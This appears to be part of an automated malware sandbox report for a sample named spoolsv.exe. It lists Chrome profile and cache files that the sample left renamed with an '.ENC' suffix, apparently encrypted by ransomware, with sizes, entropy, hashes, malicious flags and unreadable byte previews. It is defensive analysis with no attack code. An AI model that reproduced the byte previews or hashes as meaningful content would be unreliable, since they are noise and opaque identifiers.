                                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:LowNy:pNy
                                                                                                                                                                                                                                                      MD5:1D2DF1760CDF0EF05E1D6125A5A0BBD9
                                                                                                                                                                                                                                                      SHA1:376168467EFF93911789D1071E9748A7AD41FFB0
                                                                                                                                                                                                                                                      SHA-256:C305B3888F575BA066191371082AE8BE36222B9B9C96C319DAD1D7BA85ACA589
                                                                                                                                                                                                                                                      SHA-512:DA6851404B9B4D2B3171473BD531CE0F89ECB112080ACB4C910C1C32BF8AC788D33569DB05540C832D28DF1C948D4236B436991A5C6832F6FA7FE466D7412D51
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.?.M.W..:.V...g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                                                                      Entropy (8bit):7.803621310717377
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:U9U2wjZ010y9QmD0XcGXVmhJjRGSJXQPU38XOxbPg8MoGpiXlFQSP6ivr6DqCO3A:6UXF0zoMGUbUuQs3/xP3MoxCROX2WpoD
                                                                                                                                                                                                                                                      MD5:09EA5A925652F2A2BD5B7FAFE8EE73CA
                                                                                                                                                                                                                                                      SHA1:3EC2940110D7BD1E6B01BF8E4BBD636F0C29F1CE
                                                                                                                                                                                                                                                      SHA-256:D7C1B44352C33744F713A8BED0FD151206F884B62D6596F3A1AB19C36268A574
                                                                                                                                                                                                                                                      SHA-512:4C89049BDF8CFF564955E3EC3CC452637FECD07BC737EEF44CBA061AA8257092FB051C3360F73E9418DAEC515A07DB052FD56454A5B55625DD20DB3795B4D120
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:........<.....Q..%.5c.f....*...\...C:&4=..L..4.5.._..2A.."...E.0v@:+....S.../..m.. ,*.^~......Y._......+...\...6(.B.A...e?..n%........+..L.^..I97.@.(po.O....../Nq...3..*3.tp..|.j.>>....f\s.9..H.\UO*../..p.....D7......m\...........^.V ......%....3K.&.#.G}%.\.....r\c.k...X.cY.aK:..e.......$...cC.=....._...w.G6!2..C.uYD.....+U....i.&<.p{m.......L.......|.f2Va]..g.l^..6W..d.,sA......-.d..E...BkkJ..............0..."T......\.W......n.m>..e;...]%z..oF-..Z..........db|0....[........3y...?..0F...QHG.9.p.p3......J5...4.?.,...6.0|...7.I.b.....Hx.l/4.Zn/..!.]..-d[....xi..it.,`w.^.. ..Y.....u...t.....).>\.vB.'....T..o.Ij....%...$.e........ ..6N..M...v.5..J...(..z(.\../j.Q...s.V...cY....b @...+...."y...e.x?.n..?..^?.'......@.I"....8W ..d.w....v.oxi.1.j.b.../......TA[...K..........L............J..DX....5.<&....U&.........z7.<......o..hu4`c.......>.......<;3o.7gc..3QB{....w.$....o...C......e...v....6.&...!.#..%.<`...:.6?f..W.=...U.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-651E6B08-3C.pma.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4194320
                                                                                                                                                                                                                                                      Entropy (8bit):7.999956523676011
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:+/iyX4pGBHajDP/asyE6RmR7jb8H7lIpMGehVWgw5NnZHwj:TyX4pCsylwh4HJgMGPLw
                                                                                                                                                                                                                                                      MD5:EB9544A1BD1BACC09F900343527F1BA6
                                                                                                                                                                                                                                                      SHA1:B67C9CEE7C1090EC00EF42ABE340F87AA4AB9D30
                                                                                                                                                                                                                                                      SHA-256:1D1ACA1BF965DB7ADC08AF04E0920115FBB6D454DFE81FEA7804283400250351
                                                                                                                                                                                                                                                      SHA-512:6A50BC7FD0258F9379A296B2AF169CA2FA5DDA6D5606A819BB13316356DDB00174FB150B5E3104B75CAA668FC9E1CD97261040C922A50E361AACC7857ED449CC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.?...OX.....`..&.Dk...[....>..G>....L.G..rHP..RA.._..Np...w....(r.7..)y....j..M.5...\...+Y.WN).x..6M....B./]x7......k...L.C...|.U......l.<HI.!.5z...Njd2.R.J.V.kM}.r.JX)......8...J).....(...}....v.P......O.S...u.K...r.fRzp....7.i`.s0.$3..3.JPVx..0"UH....[.ko...Z..!"..C..a9..nUG.<...(,.Dv.Q.+1..p?q.b{L...B..+c..D...1B.5.'wj...^w....D.n.e.c..D..Y\..E.,.y.)&.`.g........".R.op*..f....4.]z]A&E........\.*..[4..@..LOq.#+3.._....?..D.#...~..ZW.@o...{....(.....l.J\.8.'j...;.%..{<.PMq.L...".*V.i.U..H....T|.D....&....NN...........d'.R;..z.T%..A.........FqF..;6...O$}`..q.|.i...>.{ru.Y..E....^.6..mf.]kPU>t.F.b...` !49"2..y"%...gF.T.......M.4.5U.......!4m.....y......87U....k. ..#.2E.^>.../.....vL:...>..N........^L../.....e..<..FM?@..5npO....'....9.5..Lux.+........g....Z..&.]k...,....>TN}<0...4....[.[.1...G.....d.M......\9..c.6./.Q....7.....*.~l.kNx%.G......,.3:..>..V.L.......R.IuXA..l$..........&....._..{...0...o=.....zG..g......<.x.t.w...c.6H.\.a.1/.J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\metadata.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.418295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Gbdqz0+q/90mHOL:G5qTqgL
                                                                                                                                                                                                                                                      MD5:036A41ADB0454F6BA601D07ADF559F3F
                                                                                                                                                                                                                                                      SHA1:EADE3ACB444577118550A538DB8BED1A070CAD4C
                                                                                                                                                                                                                                                      SHA-256:59D20C33516083E7AB21E8C005C769034F178C3330FFE92CA8C6E627D4350835
                                                                                                                                                                                                                                                      SHA-512:E259B7A7545D73C6D86FC2DC099FBE0546BE633092D06CC728D9393A64DE23503803C2F6DA2E5D49E81838DB946F22A95C933248A00E11D02479BD96E8DDBFE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:56..OV....^...?}....].=..Y.....M].Ci.4..j....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):45072
                                                                                                                                                                                                                                                      Entropy (8bit):7.9959509543123755
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:NTvzkYtrxUD/xgamfQIPQoqGv7AV/XINd9771NyUuwQ42QaemMayU1K:NzzkY5xuxgaKQ4qC7uvK9jyflVM
                                                                                                                                                                                                                                                      MD5:BE4338B54082F4CA11105D809DD46477
                                                                                                                                                                                                                                                      SHA1:4B2E613EA048CCC18A088634525C66F93C710507
                                                                                                                                                                                                                                                      SHA-256:5CDA8ECCAA990F411AB5A5818C8FC36929F6EC74673D8C4CE7242EDAD03C545F
                                                                                                                                                                                                                                                      SHA-512:C95389A35B4C56EFE950C7F5F2F34B43199CA790152176F074ABE907FBEE6FC0E74458608D7AB1095D315E0D3ADBCD9E7C54D4CB94E79364AFE9E617CA5FAD61
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........6`h....x...u.^.HO..G}.B>u.G..).X}.......{...8%2..T..tR...r.m.......>.7.)..<..]|......J.+....Pj.........WH?1.z y........"...k.mE..x(.. ..;...[...>..k..ut..B.....y,.7.5I.L.g..........-..e5Y..._)\[,.q6...w.....X@u\......K#g{......V....G...C.......l..p0:T......].....!...e}...yz....(AVo.@..}..m.%6..n5.I..eB..........L..#......1.P2.o.aC-....%.....R.....V-r.+..N.2.kR3...U1{!..|#.R.zM..\...hi.Dx}.Q..c.2LU<..B.;..MR.^..V*.o..jx'.&.....E...TZ$K.Eej..zP......E\4..^<.......D'..0....)..4...Of.....4.6...I.z.&Y......lf........>..4...Y.u..b.2(..P...Q..="3.".6a..HlB..u.7.K)`">.~..........`!.......kZ..cUn)=\.&...s$F.y_...6.x.....<}...z..}.q..#..}...cp.+...12.}.Nf../.V......$.."..A.&C.j...........2....W...X..7......5)..HK;.8}kG.h.$.........='tW:%1........Re:....A..'}...[y....]..].....3..w.9!..g.R...F.$.1bF4..|^..a\.....z7o6...^..N....%.2?kJ..I/.1+.|.x..D......K..).?..-....'T=.v7z....o.g..*9.e.....n....)....J......YZ.~g.'.h.)...}...U^.?I.h.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.507066080162858
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:P8U4ZaCrHf8hnlVlQa9isWl+17S0/rUQw0CuvXccirlnmYWMDigSdYnalan:Ps/7oBiiG0TUdo5BM2gSdMalan
                                                                                                                                                                                                                                                      MD5:A0A15BC8B8DD102FC7552ECD4F89C7F6
                                                                                                                                                                                                                                                      SHA1:6C52C1AF2B38441BC412929B1AEE923D21EB18D5
                                                                                                                                                                                                                                                      SHA-256:81BEB90D022EA36BFA8BFC577204796C36F52A539AFFA1910CF6480A8A68C49A
                                                                                                                                                                                                                                                      SHA-512:4FDD8F8BA1B22668D96C0C2AD07FAEC8F007746A5FC0195DCCAA4FC27DE403DC971A6D6E371BE179E5D40E14256A9EE17CE8857850BB3D0F22305577057DFFBB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.k...0&W......;X]tN'...'o.W..e..Bn.L.z.I........^p)mCC1.U.....Y.G..o.0.q.P....`E.@.Q!:.j..m`..S.}@fuT.{..<.......-J.2/eWI.f....(..h.u.P....u...lRDG....v..%.....+.>P.&x.~S+..O..B>P&...l.8\R.1Z.....U.M%m..0w.J.G....m....z..|....W.......n.T.L..w4..]...!.a.{...!`=...A........./..[I....=.],....M.|}...e...).V9..._.q..iV.....:Ko...?...X..,O...!2..J.P.Y.$...g.....W..Bvc..V...q....<...... B........C

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.8125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:8v5aDjm3:eaDC3
                                                                                                                                                                                                                                                      MD5:8FFE41B435D24EAD02EE95827441E1E5
                                                                                                                                                                                                                                                      SHA1:96C2B46CAFAE173886B88B8F9DE865234D2FA3C6
                                                                                                                                                                                                                                                      SHA-256:9F35B6E801BE37FD01957BB3DE205E540731D87699F32C74388F2BD8FFAD2325
                                                                                                                                                                                                                                                      SHA-512:73B250F7E301AB2552D19F3D9644DD07732ED31A0FA67E68182B9FB263320076C0A16FD3C6F97DF8D3C21F0BB8BF24436134F6197247BA4D6521EF2A854C7F84
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..a./.j...yv[O-.......=..=....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.976476479749426
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:AV/dl0y0I+MPCYUOfuDXy62mNh7u0rivopitLisZ1:lI+CjPkh7uKyOsn
                                                                                                                                                                                                                                                      MD5:67D3449FFB71C8F77E8276A4A7B01E68
                                                                                                                                                                                                                                                      SHA1:66559D1BCF962A19C9B372FF11E5DFBD2BD33EAC
                                                                                                                                                                                                                                                      SHA-256:EB89E207F7202F540EDFF526C592ABCB5CC4CB92FB5AA8A0DFCB292B7EC5DDCF
                                                                                                                                                                                                                                                      SHA-512:21C9A906E8D104F9128255A058EC01BE0927FB2FD0F9B43961BBB29F537319A6B2B34156C2EC3BDD4FE9B875B00B5693ADDFFF4C7500054AFDF4D13D2C377F57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Z.l._....up......eh..<.S.._YE<M)e...... pKd9.q....=i......!.{..?....@..:.(ZW..P=yI...6.^ .#2..Hk.W..k.y.a. ...].iu.C[3iM'....g.x.b...n.v.;.M....w.G+.W......vY.}..Wp.M.p'.;l^.L..........G...D.4B...X...+^..??.|O".........1...-.v.N|...Vu....K%.y.R!..T.....=?.g....G....$niu...&....!... .gU|....-.~....X...d...D......m+.I..q).EU..u.C.."3...]..CK<..^)+....!r..C..w..&..9.......?......&.1.Y.g..ZL..U...b.u.+..~}..U.w..+~.X)..A..b..>.Y...}.O..._.2i...-G........sj#N.....Pu..F....s.]..d.........@...yu.?".."FzB.sn7..!Sez.v.Y.x....G040`.g......>..{..VrS;.. ......1x..[....k..7qN;v..?......<.........".'..]/X.O....".......c.j.z..XJ....hJ$....&N.}....aa.BF..].\..i7......]...e....[.?L.d...Y..H9\...Q...V.V.....Jy.....59Z..CR.&[e.)OU[...n>..`.Gd..?`..Eu...f.6......=..+"..S.|.^..a..=PN7......+T..Ux;..7......u...]8.b?..wg1!b........=....OI#.|/${..*.2.....,.....V4.Az...C..i1.Hi[.w\K.=... ..T?6....k...N....._%.+..."_Ja..*........b...KAE...W.C.\r..x.<..0...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270352
                                                                                                                                                                                                                                                      Entropy (8bit):7.999233104629878
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:25hujpp6uK1BmNB+ONY/bJdrl7QfDtxYkYfIHrStor7h:djpjKbqcSQbPrFQfDlxuox
                                                                                                                                                                                                                                                      MD5:944DDF0713D7FE5697B9156C9B86F5C5
                                                                                                                                                                                                                                                      SHA1:ADAF97427D2141AD958E12F05DE767EB74D27140
                                                                                                                                                                                                                                                      SHA-256:41ADB97B614A126E0B195A3F9721FD8C8B8846B927148A1614C4E7B1585715D9
                                                                                                                                                                                                                                                      SHA-512:BAE62EAF26A2DBC68D1FBCF715F3B6B59FCD2FF596D172A457B657BCD298108A425CC492C0FC265BAC852252DFF941C3AA8B580880A0E7D4D11E02D79F6922B6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:/.NR/.,..[........!>...T..pl...DO...m~r.P....v...p.A_..I .G].....K}.U9C...g..v.} ?....RZ4..E.N...ij...q..N..L.^....9...>q.{%vj.I.e....v...5.._r..eWZe....M|....*-..4._.....~p.........G-<...H...=.U.....?A..DO'F|"....H..R)a.ds..R.kD;&].kk.%...D.=U.1).....z..e.5'......~;oE.1.o.d..7..........">...jq.R.R.f..Q./e..D...".,.B..C........~...i.5.@.s..E.C..pv.l...F...l..^...#.yh/.I..-V.......W....$.~.......Z...Z.`..........m.0.li...{^._Q.....l....:....O..R.Tl....h..."...O..(S....\...ql.~.....j:.d..(0.S....e...z.v2...`...."BS..<.=`.....W7.......7}...m!dF....e.D.n.@..f......a.'..Z._\...9..............q^M0....).[/.....a..I.+.T.....1u6.....s.....+0..\......KXF..........8.Y.\c.\+...~v....e.......k.G7.......NG.Y.......1..'..yA._.z.........r.._`KV....p..gJ..=i..I.Y.r...;.r...QMX....s'.J...m.....1..y0. ..q...z.&....3...x./.?r.D.&...h@l........A.....n....+|F.}...8..r.0...)...?.#.%2R.j....-......6p.1;.\..#..D..M.3.H.....P.G.|...9.B.vT....a.@.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.97783199729344
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RUHUxe7HbS93HchHpRe963lNr30dKq3C5WakFajRY:OH+9MhJs963lNgK78aiyRY
                                                                                                                                                                                                                                                      MD5:E9570C05758D7F027A0B6D30D775B2AE
                                                                                                                                                                                                                                                      SHA1:0871E5E41EE6DF7681704EDC4A15D0F108CCCF0A
